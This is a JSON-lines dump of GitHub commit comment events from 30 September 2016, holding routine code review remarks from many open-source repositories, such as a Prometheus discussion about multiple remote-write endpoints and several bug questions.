{"id":"4643094187","type":"CommitCommentEvent","actor":{"login":"sbidoul"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":19240048,"position":null,"line":null,"path":null,"commit_id":"76c443eda331b75bf5dfa7ec22b8eb22e1084343","created_at":"2016-09-30T12:17:20Z","updated_at":"2016-09-30T12:17:20Z","body":":clap: "}},"created_at":"2016-09-30T12:17:20Z"}
{"id":"4643095844","type":"CommitCommentEvent","actor":{"login":"andreaiacono"},"repo":{"name":"andreaiacono/OpenCVDemo"},"payload":{"comment":{"id":19240051,"position":null,"line":null,"path":null,"commit_id":"e681aea13d35a2f9a0d3b12c1fb175a639813f2b","created_at":"2016-09-30T12:17:38Z","updated_at":"2016-09-30T12:17:38Z","body":"Van,\r\ndo you know how NN work? Are you a beginner in NN field or as a programmer? \r\nHave you tries to write this question to http://cs.stackexchange.com/ ?\r\n\r\nAndrea\r\n"}},"created_at":"2016-09-30T12:17:38Z"}
{"id":"4643098681","type":"CommitCommentEvent","actor":{"login":"cheh"},"repo":{"name":"CherryFramework/cherry-framework"},"payload":{"comment":{"id":19240060,"position":143,"line":143,"path":"modules/cherry-template-manager/inc/cherry-template-loader.php","commit_id":"6b79035d0fe87821dd1e4f985c95840d0e0a8fc0","created_at":"2016-09-30T12:18:18Z","updated_at":"2016-09-30T12:18:18Z","body":"https://developer.wordpress.org/reference/functions/wp_normalize_path/ - заменяет обратные слэши на прямые слэши и двойные слэши на одинарные."}},"created_at":"2016-09-30T12:18:18Z"}
{"id":"4643099453","type":"CommitCommentEvent","actor":{"login":"rim-odoo"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":19240062,"position":null,"line":null,"path":null,"commit_id":"76c443eda331b75bf5dfa7ec22b8eb22e1084343","created_at":"2016-09-30T12:18:29Z","updated_at":"2016-09-30T12:18:29Z","body":"![](http://media.tumblr.com/tumblr_mers5oPeqd1raj8mk.gif)"}},"created_at":"2016-09-30T12:18:29Z"}
{"id":"4643099800","type":"CommitCommentEvent","actor":{"login":"inacionery"},"repo":{"name":"simpleanduseful/clockin"},"payload":{"comment":{"id":19240063,"position":4,"line":13,"path":"src/main/webapp/content/css/clockin.css","commit_id":"cd2734869248459524a219e2f2f9e5191cdafbd9","created_at":"2016-09-30T12:18:33Z","updated_at":"2016-09-30T12:18:33Z","body":"We need a front-end monster to do this. @fernandosouza could be you. \r\n"}},"created_at":"2016-09-30T12:18:33Z"}
{"id":"4643100907","type":"CommitCommentEvent","actor":{"login":"wuxipaopao"},"repo":{"name":"FreeCodeCampChina/freecodecamp.cn"},"payload":{"comment":{"id":19240067,"position":null,"line":null,"path":null,"commit_id":"4b6e25bdaec776775bd33ffb17c01ce0408bce99","created_at":"2016-09-30T12:18:50Z","updated_at":"2016-09-30T12:18:50Z","body":"\"everything be true\"这道题的翻译得不准确，并不是判断collection中的所有对象都存在属性pre，而是判断collection中的所有对象的pre属性的值是否为真值，即等效于true的值。"}},"created_at":"2016-09-30T12:18:50Z"}
{"id":"4643103641","type":"CommitCommentEvent","actor":{"login":"xen0l"},"repo":{"name":"OpenIndiana/oi-userland"},"payload":{"comment":{"id":19240070,"position":null,"line":null,"path":null,"commit_id":"dbeadc8a314c4d063b51f4c686f82a4599023752","created_at":"2016-09-30T12:19:30Z","updated_at":"2016-09-30T12:19:30Z","body":"What's the reason behind this change?"}},"created_at":"2016-09-30T12:19:30Z"}
{"id":"4643111191","type":"CommitCommentEvent","actor":{"login":"exjam"},"repo":{"name":"decaf-emu/decaf-emu"},"payload":{"comment":{"id":19240085,"position":null,"line":null,"path":null,"commit_id":"f514e5081b5a2e52e59943dd9f9c27a475f479eb","created_at":"2016-09-30T12:21:20Z","updated_at":"2016-09-30T12:21:20Z","body":"Is this actually correct? The point of using bus=1u then [bus] is because mainBus = busSamples[0]. By using [bus-1] then your mixing the mainBus into itself and then all the sub bus except 1 at the end..?"}},"created_at":"2016-09-30T12:21:20Z"}
{"id":"4643114399","type":"CommitCommentEvent","actor":{"login":"exjam"},"repo":{"name":"decaf-emu/decaf-emu"},"payload":{"comment":{"id":19240091,"position":null,"line":null,"path":null,"commit_id":"8160f5b113bcdc01584eb8b09f414f2479fddf4d","created_at":"2016-09-30T12:22:04Z","updated_at":"2016-09-30T12:22:04Z","body":"Oh you fixed it here. 👍 "}},"created_at":"2016-09-30T12:22:04Z"}
{"id":"4643115889","type":"CommitCommentEvent","actor":{"login":"FlameFractal"},"repo":{"name":"dipdeb/imad-2016-app"},"payload":{"comment":{"id":19240094,"position":3,"line":3,"path":"ui/main.js","commit_id":"fa20c7cef562a53e79fa99ab3a091a8fcb87a0c1","created_at":"2016-09-30T12:22:23Z","updated_at":"2016-09-30T12:22:23Z","body":"This is the right way to compare."}},"created_at":"2016-09-30T12:22:23Z"}
{"id":"4643120050","type":"CommitCommentEvent","actor":{"login":"watchlondon"},"repo":{"name":"WordPress/theme-check"},"payload":{"comment":{"id":19240102,"position":5,"line":8,"path":"theme-check.php","commit_id":"406b26f405527e7afd6733e1b4581aa2941029c6","created_at":"2016-09-30T12:23:22Z","updated_at":"2016-09-30T12:23:22Z","body":"version: 20151211 .1 + Version: 20160523 .1               "}},"created_at":"2016-09-30T12:23:22Z"}
{"id":"4643120454","type":"CommitCommentEvent","actor":{"login":"madsny"},"repo":{"name":"blankoslo/blankweb"},"payload":{"comment":{"id":19240103,"position":6,"line":30,"path":"blankweb/settings.py","commit_id":"93fe1c6e48f322c2fce036fbfe2a30cf59063d4c","created_at":"2016-09-30T12:23:28Z","updated_at":"2016-09-30T12:23:28Z","body":"Ser ikke ut som dette kicker inn i prod i dag"}},"created_at":"2016-09-30T12:23:28Z"}
{"id":"4643120523","type":"CommitCommentEvent","actor":{"login":"GotoFinal"},"repo":{"name":"Pikselke/McHurtWorld"},"payload":{"comment":{"id":19240104,"position":69,"line":69,"path":"src/pl/pikselke/mchw/bag/BackPack.java","commit_id":"185d2606211388a2e6f069b857ceaceeab38ae5c","created_at":"2016-09-30T12:23:29Z","updated_at":"2016-09-30T12:23:29Z","body":"@xVacuum nie, jeszcze głupsze jest dodanie do mysqla tylko po to by i tak to wczytywac na starcie, pliki yaml się tutaj idealne, tylko że 1 na plecak, wczytanie pliku jest bardzo szybkie i bukkit wspiera pełny zapis do yaml, zapisując w bazie albo musisz się pierniczyc z refleksami lub nms, a po co do takiego pluginu? Albo zapisywać yamlem w tabeli...\r\n\r\nA jak się chce na kilka serwerów to wtedy mysql ma sens, ogolnie powinien być interfejs z metodami ładowania i zapisu, i wtedy możesz zaimplementować po pliku i po mysql i po redisie, dodawać, usuwać itd itp. I użytkownik sam wybiera, szybkie pliki, mysql, czy szybki i fajny redis"}},"created_at":"2016-09-30T12:23:29Z"}
{"id":"4643121920","type":"CommitCommentEvent","actor":{"login":"Mattenable"},"repo":{"name":"oleksiyk/kafka"},"payload":{"comment":{"id":19240110,"position":76,"line":185,"path":"lib/connection.js","commit_id":"7dabcf2bf7c361f2514bb70d42d7c9f97ef67a2f","created_at":"2016-09-30T12:23:49Z","updated_at":"2016-09-30T12:23:49Z","body":"Sorry for the delayed response. Got pulled in another direction. Can I assume 2.8.1 is a fix for this?"}},"created_at":"2016-09-30T12:23:49Z"}
{"id":"4643122155","type":"CommitCommentEvent","actor":{"login":"watchlondon"},"repo":{"name":"WordPress/theme-check"},"payload":{"comment":{"id":19240111,"position":4,"line":8,"path":"theme-check.php","commit_id":"406b26f405527e7afd6733e1b4581aa2941029c6","created_at":"2016-09-30T12:23:52Z","updated_at":"2016-09-30T12:23:52Z","body":"20160523"}},"created_at":"2016-09-30T12:23:52Z"}
{"id":"4643124871","type":"CommitCommentEvent","actor":{"login":"ophthal"},"repo":{"name":"ophthal/openEMR_2"},"payload":{"comment":{"id":19240123,"position":null,"line":null,"path":null,"commit_id":"83260fec79ca32e8e8ede26c38c818691d3a9f63","created_at":"2016-09-30T12:24:31Z","updated_at":"2016-09-30T12:24:31Z","body":"\n> On Sep 30, 2016, at 4:43 AM, Brady Miller <notifications@github.com> wrote:\n> \n> best way to learn git is to keep trying things and breaking a bunch of things along the way :)\n> \n> Just let me know if need guidance for something. Unless you have new stuff on this branch (I brought in 2 of the commits), I would consider this branch toast :) and would recommend developing from a branch derived from the most recent master from the main codebase. Once you figure out how to do that, then it becomes really simple to to Pull Requests on github for your code. Trust me, in time you will become a git wizard.\n> \n> As\n> \nI work primarily on a Mac with Tower for the git stuff.  I use VirtualBox to run VMs locally, most recently Ubuntu 16.04LTS Server and then use command-line git to pull in branches in an apache accessible directory, as well as a series of remote Linode servers running different OLD flavors of Debian/CentOS etc, all controlled centrally by ISPconfig3.  I use an FTP client to access files on the Linodes via SSH tunnel and edit PHP with Sublime Text, JS with XCode.  I also run a couple of VOIP servers with Asterisk - that is why I thought maybe I would look into merging OpenEMR with Asterisk…  The recipes for Asterisk are not that complicated, but they are very powerful.  Problem is each time I leave a project, and then return, there is a ramp-up period to wrap my head around the code.  It’s been many years since I got under the asterisk hood…  And since I don’t actually program, it takes me a long time to get things rolling.  I think Asterisk and openEMR would be a perfect fit…  In situations like this, I may be better off heading over to Freelancer.com and look for help…  \n\nIn my day job, I run OpenEMR on Windows :)\n\nRay\n\n\n> an aside, what are your development environment specifics?\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub <https://github.com/ophthal/openEMR_2/commit/83260fec79ca32e8e8ede26c38c818691d3a9f63#commitcomment-19238016>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AAfDcLHyhId96Lo0M_nUPg4HsBEqJq_Kks5qvMuxgaJpZM4KKn6L>.\n> \n\n"}},"created_at":"2016-09-30T12:24:31Z"}
{"id":"4643128099","type":"CommitCommentEvent","actor":{"login":"GotoFinal"},"repo":{"name":"Pikselke/McHurtWorld"},"payload":{"comment":{"id":19240135,"position":15,"line":14,"path":"src/pl/pikselke/mchw/listeners/PlayerJoinQuitListener.java","commit_id":"185d2606211388a2e6f069b857ceaceeab38ae5c","created_at":"2016-09-30T12:25:18Z","updated_at":"2016-09-30T12:25:18Z","body":"\"Weszedl\" xD "}},"created_at":"2016-09-30T12:25:18Z"}
{"id":"4643129949","type":"CommitCommentEvent","actor":{"login":"dpeddi"},"repo":{"name":"oe-alliance/oe-alliance-settings"},"payload":{"comment":{"id":19240142,"position":null,"line":null,"path":null,"commit_id":"a6943ddfd7a2fc1f31bdce5c228d302936deeb27","created_at":"2016-09-30T12:25:42Z","updated_at":"2016-09-30T12:25:42Z","body":"I've said i can maintain them. You just unpack the zip?\n\nIl 30/set/2016 05:05 AM, \"Rob van der Does\" <notifications@github.com> ha\nscritto:\n\n> Good point: I'll delete all VHannibal's settings. That saves me a lot of\n> work, and through that plugin everybody can have updated settings.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/oe-alliance/oe-alliance-settings/commit/a6943ddfd7a2fc1f31bdce5c228d302936deeb27#commitcomment-19235724>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABCVX5JYzVWKNMMvyNqOOa4vrUuU2pmwks5qvHyTgaJpZM4KKDHi>\n> .\n>\n"}},"created_at":"2016-09-30T12:25:42Z"}
{"id":"4643130614","type":"CommitCommentEvent","actor":{"login":"markussmiettinen"},"repo":{"name":"NMRLipids/lipid_ionINTERACTION"},"payload":{"comment":{"id":19240144,"position":null,"line":null,"path":null,"commit_id":"ed9f3055fa4d3983c2b45926214f2cae4f9b5bd5","created_at":"2016-09-30T12:25:51Z","updated_at":"2016-09-30T12:25:51Z","body":"I think the box should not be wholly within one panel, as it concerns the whole figure. How about keeping the current vertical location and moving on it horizontally to the left half of the panel (i.e. under the first stars, but not wholly inside the Berger-OPLS panel)?"}},"created_at":"2016-09-30T12:25:51Z"}
{"id":"4643130683","type":"CommitCommentEvent","actor":{"login":"juliusv"},"repo":{"name":"prometheus/prometheus"},"payload":{"comment":{"id":19240145,"position":16,"line":195,"path":"config/config.go","commit_id":"4520e124403b234ef973636dc4c17e197ad423b4","created_at":"2016-09-30T12:25:52Z","updated_at":"2016-09-30T12:25:52Z","body":"We want to support writing to multiple remote endpoints, no?"}},"created_at":"2016-09-30T12:25:52Z"}
{"id":"4643130942","type":"CommitCommentEvent","actor":{"login":"yanex"},"repo":{"name":"yanex/uast-android-tools-base"},"payload":{"comment":{"id":19240146,"position":127,"line":2575,"path":"lint/libs/lint-checks/src/main/java/com/android/tools/lint/checks/ApiDetector.java","commit_id":"1dc6264468b92f94f9535b49e668784258ed818f","created_at":"2016-09-30T12:25:55Z","updated_at":"2016-09-30T12:25:55Z","body":"Not really major, but looks like `isSth()` is consistent with other visitor methods (`MediaSessionCallbackVisitor`, `ShowFinder`, etc.)."}},"created_at":"2016-09-30T12:25:55Z"}
{"id":"4643134116","type":"CommitCommentEvent","actor":{"login":"juliusv"},"repo":{"name":"prometheus/prometheus"},"payload":{"comment":{"id":19240149,"position":16,"line":195,"path":"config/config.go","commit_id":"4520e124403b234ef973636dc4c17e197ad423b4","created_at":"2016-09-30T12:26:39Z","updated_at":"2016-09-30T12:26:39Z","body":"This results in a config like:\r\n\r\n```\r\nremote_write:\r\n  - url: \"http://localhost:1234/\"\r\n  - url: \"http://localhost:1235/\"\r\n```"}},"created_at":"2016-09-30T12:26:39Z"}
{"id":"4643138340","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"hakaru-dev/hakaru"},"payload":{"comment":{"id":19240166,"position":null,"line":null,"path":null,"commit_id":"9332998dcf6812c5e635fe3ed7570328b0353361","created_at":"2016-09-30T12:27:36Z","updated_at":"2016-09-30T12:27:36Z","body":"It used to be implemented quite differently [it may no longer be], and so was significantly slower for large expressions."}},"created_at":"2016-09-30T12:27:36Z"}
{"id":"4643140398","type":"CommitCommentEvent","actor":{"login":"brian-brazil"},"repo":{"name":"prometheus/prometheus"},"payload":{"comment":{"id":19240171,"position":16,"line":195,"path":"config/config.go","commit_id":"4520e124403b234ef973636dc4c17e197ad423b4","created_at":"2016-09-30T12:28:06Z","updated_at":"2016-09-30T12:28:06Z","body":"No, we had agreed on supporting only exactly one. Multiple endpoints was never discussed at any stage for the write path.\r\n\r\nI'm in the middle of doing the relabelling support, and this breaks it so I'm going back to just one."}},"created_at":"2016-09-30T12:28:06Z"}
{"id":"4643141840","type":"CommitCommentEvent","actor":{"login":"loup99"},"repo":{"name":"loup99/WtWSMS"},"payload":{"comment":{"id":19240175,"position":null,"line":null,"path":null,"commit_id":"dd038562dfdfd2f4b3a44a3e8e2232c064b51540","created_at":"2016-09-30T12:28:23Z","updated_at":"2016-09-30T12:28:23Z","body":"I don't know, as it is only listed in that dictionary, so maybe they did the same typo as Enlil? "}},"created_at":"2016-09-30T12:28:23Z"}
{"id":"4643142996","type":"CommitCommentEvent","actor":{"login":"and-kisorec"},"repo":{"name":"Code-Poets/sandbox"},"payload":{"comment":{"id":19240176,"position":9,"line":19,"path":"yoowul/マイリトルプロジェクト/ファンシーアプリ/templates/index.html","commit_id":"886bed8ea6f3dc79d39bd10e3c1cf113f28b3121","created_at":"2016-09-30T12:28:40Z","updated_at":"2016-09-30T12:28:40Z","body":"There must be a </body> tag"}},"created_at":"2016-09-30T12:28:40Z"}
{"id":"4643143108","type":"CommitCommentEvent","actor":{"login":"auser"},"repo":{"name":"GSOinteractive/react-native-firestack"},"payload":{"comment":{"id":19240177,"position":5,"line":22,"path":"ios/Firestack/FirestackAuth.m","commit_id":"ae40fecfffc4a760a94e9ba3cd84599bf54676db","created_at":"2016-09-30T12:28:41Z","updated_at":"2016-09-30T12:28:41Z","body":"Yes, it's possible to do that with the callback. \r\n\r\nSee firestackdatabase for examples. "}},"created_at":"2016-09-30T12:28:41Z"}
{"id":"4643143443","type":"CommitCommentEvent","actor":{"login":"GotoFinal"},"repo":{"name":"Pikselke/McHurtWorld"},"payload":{"comment":{"id":19240178,"position":44,"line":44,"path":"src/pl/pikselke/mchw/scoreboard/ScoreBoardListener.java","commit_id":"185d2606211388a2e6f069b857ceaceeab38ae5c","created_at":"2016-09-30T12:28:45Z","updated_at":"2016-09-30T12:28:45Z","body":"@xVaccum nie w takiej skali, narzut jest zbyt mały by się nim tutaj przejmować, tylko też nie widzę sensu używania streama do tak prostej operacji, streamy są fajne jak mamy wiele warunków itd, np wyszukujemy graczy z nickiem na A, dajemy im ciastko, potem jeszcze filtrujemy by mieć graczy z nickiem kończącym się na B, i ich banujemy, wszystko wykona się w tej kolejności, co z pętlami jest ogarnąć trudniej i zamiast jednej linijki będzie z 20."}},"created_at":"2016-09-30T12:28:45Z"}
{"id":"4643146481","type":"CommitCommentEvent","actor":{"login":"yanex"},"repo":{"name":"yanex/uast-android-tools-base"},"payload":{"comment":{"id":19240187,"position":57,"line":2128,"path":"lint/libs/lint-checks/src/main/java/com/android/tools/lint/checks/ApiDetector.java","commit_id":"3731f2ff2bbc53b1708660e72aa98b6a9b5603ec","created_at":"2016-09-30T12:29:29Z","updated_at":"2016-09-30T12:29:29Z","body":"Ah, all's ok, I misunderstood."}},"created_at":"2016-09-30T12:29:29Z"}
{"id":"4643148411","type":"CommitCommentEvent","actor":{"login":"mingxuWang"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19240193,"position":49,"line":49,"path":"madanni/coupon/coupon.js","commit_id":"552d837b334b32130a50db389e5ceee1a66f0f37","created_at":"2016-09-30T12:29:58Z","updated_at":"2016-09-30T12:29:58Z","body":"model中有以下几个方法：\r\n`formatData`、`formatSelectedData`、`formatPostParam`(’内部方法‘)、`getRenderData`\r\n`getList`、`getSkuList`\r\n`add`、\r\n`logSend`\r\n\r\n这其中formatData方法做的是初始化initialize中传入的options参数的，并没有格式化数据；\r\nformatPostParam方法是进行了组织数据的功能；\r\nformatSelectedData起到的是修饰数据的功能；\r\ngetRenderData是组织数据返回需要渲染的内容；(它与getList和getSkuList方法本质就不同)\r\n以上四个format方法的使用存在命名和功能上的差异。\r\n\r\n我认为正常的逻辑应该是数据获取成功之后进行相应的渲染，也就是getList->render,数据直接从model中获取，而这里是getList->render->getRenderData，也就是说这里的getRenderData相当于是this.model.get(\"xxx\")，但是为什么不直接把组织好的数据存储到model中？如果是多次使用到这个属性的话那不就相当于多次进行format？\r\n\r\n这其中2 3两个format方法都是直接将传入的源数据进行了修改，是不是应该return一个新的对象回去？如果后续再用到源数据怎么办？"}},"created_at":"2016-09-30T12:29:58Z"}
{"id":"4643156974","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"hakaru-dev/hakaru"},"payload":{"comment":{"id":19240205,"position":null,"line":null,"path":null,"commit_id":"af52f5c030fedf31c13eb5270510198c617aab9a","created_at":"2016-09-30T12:31:50Z","updated_at":"2016-09-30T12:31:50Z","body":"I don't think it is a good idea to put a `print` in a `userinfo`: that is essentially double-printing."}},"created_at":"2016-09-30T12:31:50Z"}
{"id":"4643159238","type":"CommitCommentEvent","actor":{"login":"ChristopherEdwards"},"repo":{"name":"shabiel/fis-gtm"},"payload":{"comment":{"id":19240210,"position":38,"line":159,"path":"sr_darwin/obj_filesp.c","commit_id":"bc0e1bf17136f920b46ac14f7384749ef4fa015d","created_at":"2016-09-30T12:32:18Z","updated_at":"2016-09-30T12:32:18Z","body":"In the final version of this the comment should be updated to be mach-o instead of ELF"}},"created_at":"2016-09-30T12:32:18Z"}
{"id":"4643160008","type":"CommitCommentEvent","actor":{"login":"NoHaxJustTryHqrd"},"repo":{"name":"iTXTech/Phoenix"},"payload":{"comment":{"id":19240212,"position":null,"line":null,"path":null,"commit_id":"4198c445b05c8808f94eeb145738fd36f850b34d","created_at":"2016-09-30T12:32:29Z","updated_at":"2016-09-30T12:32:29Z","body":"Did you fully test the furnace?\r\nI have a version of Phoenix running and as soon as saveNBT() functions runs the server immediatly crashes with my vps killing the server\r\nHere is the error code\r\n Error: Call to a member function getItem() on null\r\nThis error code does not show up when i never place a furnace\r\n"}},"created_at":"2016-09-30T12:32:29Z"}
{"id":"4643163519","type":"CommitCommentEvent","actor":{"login":"van562"},"repo":{"name":"andreaiacono/OpenCVDemo"},"payload":{"comment":{"id":19240222,"position":null,"line":null,"path":null,"commit_id":"e681aea13d35a2f9a0d3b12c1fb175a639813f2b","created_at":"2016-09-30T12:33:17Z","updated_at":"2016-09-30T12:33:17Z","body":"Yes, I do know how it work. NN is new to me. My programming skill is solid. "}},"created_at":"2016-09-30T12:33:17Z"}
{"id":"4643163797","type":"CommitCommentEvent","actor":{"login":"ohsOllila"},"repo":{"name":"NMRLipids/lipid_ionINTERACTION"},"payload":{"comment":{"id":19240223,"position":null,"line":null,"path":null,"commit_id":"ed9f3055fa4d3983c2b45926214f2cae4f9b5bd5","created_at":"2016-09-30T12:33:21Z","updated_at":"2016-09-30T12:33:21Z","body":"That probably helps as well."}},"created_at":"2016-09-30T12:33:21Z"}
{"id":"4643171159","type":"CommitCommentEvent","actor":{"login":"Idrinth"},"repo":{"name":"Idrinth/IDotD"},"payload":{"comment":{"id":19240238,"position":26,"line":4,"path":"src/mods/text.js","commit_id":"43099c12addb0faa57a9e86916a00c84ec73cb35","created_at":"2016-09-30T12:35:04Z","updated_at":"2016-09-30T12:35:04Z","body":"this is still on the wrong level - should rather be a property of idrinth.text"}},"created_at":"2016-09-30T12:35:04Z"}
{"id":"4643172246","type":"CommitCommentEvent","actor":{"login":"juliusv"},"repo":{"name":"prometheus/prometheus"},"payload":{"comment":{"id":19240241,"position":16,"line":195,"path":"config/config.go","commit_id":"4520e124403b234ef973636dc4c17e197ad423b4","created_at":"2016-09-30T12:35:18Z","updated_at":"2016-09-30T12:35:18Z","body":"In what forum did that agreement happen? I don't remember it, more like the opposite, but maybe my memory fails me. In https://github.com/prometheus/prometheus/pull/1957#issuecomment-247989777 you even touched on how to handle an aspect of having multiple endpoints...\r\n\r\nThe rationale for having multiple would be if someone wants to write e.g. to a long-term storage, but also to a queuing system or other stream-processing system. What's the rationale against it?"}},"created_at":"2016-09-30T12:35:18Z"}
{"id":"4643173676","type":"CommitCommentEvent","actor":{"login":"Idrinth"},"repo":{"name":"Idrinth/IDotD"},"payload":{"comment":{"id":19240243,"position":72,"line":32,"path":"src/mods/text.js","commit_id":"43099c12addb0faa57a9e86916a00c84ec73cb35","created_at":"2016-09-30T12:35:37Z","updated_at":"2016-09-30T12:35:37Z","body":"not rather game.reload ?"}},"created_at":"2016-09-30T12:35:37Z"}
{"id":"4643177802","type":"CommitCommentEvent","actor":{"login":"mingxuWang"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19240250,"position":297,"line":297,"path":"madanni/coupon/coupon.js","commit_id":"552d837b334b32130a50db389e5ceee1a66f0f37","created_at":"2016-09-30T12:36:29Z","updated_at":"2016-09-30T12:36:29Z","body":"这步应该在render中进行吧。"}},"created_at":"2016-09-30T12:36:29Z"}
{"id":"4643178853","type":"CommitCommentEvent","actor":{"login":"Idrinth"},"repo":{"name":"Idrinth/IDotD"},"payload":{"comment":{"id":19240252,"position":2,"line":2,"path":"src/mods/text.js","commit_id":"43099c12addb0faa57a9e86916a00c84ec73cb35","created_at":"2016-09-30T12:36:42Z","updated_at":"2016-09-30T12:36:42Z","body":"wouldn't a simple get be sufficient - we are in the text-object already after all ;)"}},"created_at":"2016-09-30T12:36:42Z"}
{"id":"4643180174","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"iTXTech/Phoenix"},"payload":{"comment":{"id":19240254,"position":null,"line":null,"path":null,"commit_id":"4198c445b05c8808f94eeb145738fd36f850b34d","created_at":"2016-09-30T12:36:59Z","updated_at":"2016-09-30T12:36:59Z","body":"Please open an issue with details and crashdumps if you have one. I'll enable the issue tracker now."}},"created_at":"2016-09-30T12:36:59Z"}
{"id":"4643183203","type":"CommitCommentEvent","actor":{"login":"Corrod3"},"repo":{"name":"Corrod3/1st-Pair-Assignment"},"payload":{"comment":{"id":19240261,"position":null,"line":null,"path":null,"commit_id":"1f68b9c169fcc49daf9c6e4e18cc79b74abfbe83","created_at":"2016-09-30T12:37:38Z","updated_at":"2016-09-30T12:37:38Z","body":"Can you add me as a contributor?"}},"created_at":"2016-09-30T12:37:38Z"}
{"id":"4643184971","type":"CommitCommentEvent","actor":{"login":"masone"},"repo":{"name":"upfrontIO/livingdocs-docker"},"payload":{"comment":{"id":19240267,"position":4,"line":15,"path":"deploy/docker-compose.yml","commit_id":"d62070cb2e8edb25456365af17dccfa466f517d4","created_at":"2016-09-30T12:38:00Z","updated_at":"2016-09-30T12:38:00Z","body":":trollface: "}},"created_at":"2016-09-30T12:38:00Z"}
{"id":"4643185284","type":"CommitCommentEvent","actor":{"login":"rachmadaniHaryono"},"repo":{"name":"pushrbx/python3-mal"},"payload":{"comment":{"id":19240268,"position":null,"line":null,"path":null,"commit_id":"a50b3b23ec7ea91e1c0e8f66e76a6a68b782f262","created_at":"2016-09-30T12:38:04Z","updated_at":"2016-09-30T12:38:04Z","body":"hi, can i copy this to my fork f42f246503e65705ad9e28c626df37bb9b456d91 ? thanks\r\n\r\n"}},"created_at":"2016-09-30T12:38:04Z"}
{"id":"4643189468","type":"CommitCommentEvent","actor":{"login":"Ardenian"},"repo":{"name":"Idrinth/IDotD"},"payload":{"comment":{"id":19240274,"position":72,"line":32,"path":"src/mods/text.js","commit_id":"43099c12addb0faa57a9e86916a00c84ec73cb35","created_at":"2016-09-30T12:39:02Z","updated_at":"2016-09-30T12:39:02Z","body":"Since we have 'several' reloads, I thought about grouping them that way. Shouldn#t hurt to swap it"}},"created_at":"2016-09-30T12:39:02Z"}
{"id":"4643196035","type":"CommitCommentEvent","actor":{"login":"Marsu5"},"repo":{"name":"Marsu5/TokinGame"},"payload":{"comment":{"id":19240287,"position":null,"line":null,"path":null,"commit_id":"29c7ea8a6caa852b95251d3744bd085c222765a2","created_at":"2016-09-30T12:40:30Z","updated_at":"2016-09-30T12:40:30Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Kezdp](https://trello.com/c/aaZ24UFs/23-kezdp)"}},"created_at":"2016-09-30T12:40:30Z"}
{"id":"4643196148","type":"CommitCommentEvent","actor":{"login":"Marsu5"},"repo":{"name":"Marsu5/TokinGame"},"payload":{"comment":{"id":19240288,"position":null,"line":null,"path":null,"commit_id":"29c7ea8a6caa852b95251d3744bd085c222765a2","created_at":"2016-09-30T12:40:31Z","updated_at":"2016-09-30T12:40:31Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Kezdp](https://trello.com/c/aaZ24UFs/23-kezdp)"}},"created_at":"2016-09-30T12:40:31Z"}
{"id":"4643196602","type":"CommitCommentEvent","actor":{"login":"Idrinth"},"repo":{"name":"Idrinth/IDotD"},"payload":{"comment":{"id":19240291,"position":72,"line":32,"path":"src/mods/text.js","commit_id":"43099c12addb0faa57a9e86916a00c84ec73cb35","created_at":"2016-09-30T12:40:37Z","updated_at":"2016-09-30T12:40:37Z","body":"my reason for switching is, that the game is affected by the reload, not the reload by the game - you follow that with pretty much everything but the reloads"}},"created_at":"2016-09-30T12:40:37Z"}
{"id":"4643200122","type":"CommitCommentEvent","actor":{"login":"amedranogil"},"repo":{"name":"universAAL/ontology"},"payload":{"comment":{"id":19240301,"position":19,"line":71,"path":"ont.cryptographic/src/main/java/org/universAAL/ontology/CryptographicFactory.java","commit_id":"465cd8919990faaf805c9ec34d7fe7acdf57697a","created_at":"2016-09-30T12:41:24Z","updated_at":"2016-09-30T12:41:24Z","body":"AES is not abstract because the super class is already abstract, I needed an instance of the generic concept representing an algorithm. another option I had was to make the super class not-abstract (maybe even leaf) and just have normal instances there, but this didn't feel right because these algorithms could be classified further, thus this strange solution of \"singleton class\" concept..."}},"created_at":"2016-09-30T12:41:24Z"}
{"id":"4643201254","type":"CommitCommentEvent","actor":{"login":"Cubemaster7"},"repo":{"name":"Cubemaster7/OrbicTextAdventure"},"payload":{"comment":{"id":19240303,"position":null,"line":null,"path":null,"commit_id":"1460febeb1dfc8e0109d17e2375e355c4a0af0cb","created_at":"2016-09-30T12:41:40Z","updated_at":"2016-09-30T12:41:40Z","body":"So it turns out Github *doesn't* automatically combine commits if one was started before the other but finished after the other. It might be a good idea to have a separate branches, and then we can use pull requests to combine them (Which keeps as much as it can)."}},"created_at":"2016-09-30T12:41:40Z"}
{"id":"4643206973","type":"CommitCommentEvent","actor":{"login":"andreaiacono"},"repo":{"name":"andreaiacono/OpenCVDemo"},"payload":{"comment":{"id":19240318,"position":null,"line":null,"path":null,"commit_id":"e681aea13d35a2f9a0d3b12c1fb175a639813f2b","created_at":"2016-09-30T12:42:53Z","updated_at":"2016-09-30T12:42:53Z","body":"and can you use a library (for NeuralNetworks, for example) or you have to write everything on your own?\r\n"}},"created_at":"2016-09-30T12:42:53Z"}
{"id":"4643210633","type":"CommitCommentEvent","actor":{"login":"NicolasGrosjean"},"repo":{"name":"loup99/WtWSMS"},"payload":{"comment":{"id":19240325,"position":null,"line":null,"path":null,"commit_id":"dd038562dfdfd2f4b3a44a3e8e2232c064b51540","created_at":"2016-09-30T12:43:44Z","updated_at":"2016-09-30T12:43:44Z","body":"There is also an entry for heresey in this dictionary...\r\nEnlil will bring us the light."}},"created_at":"2016-09-30T12:43:44Z"}
{"id":"4643211898","type":"CommitCommentEvent","actor":{"login":"nahin08"},"repo":{"name":"nahin08/python-repo"},"payload":{"comment":{"id":19240326,"position":4,"line":3,"path":"README.md","commit_id":"2917d32e35b40f02eb66789dad34d6b07964fa8c","created_at":"2016-09-30T12:44:01Z","updated_at":"2016-09-30T12:44:01Z","body":"The script is written in python 2.7.11. Place the simple_download.py, MyTest.py and all the .txt files in the same directory. Change the destination directory inside simple_download.py according to your choice. run the test suite MyTest.py.  "}},"created_at":"2016-09-30T12:44:01Z"}
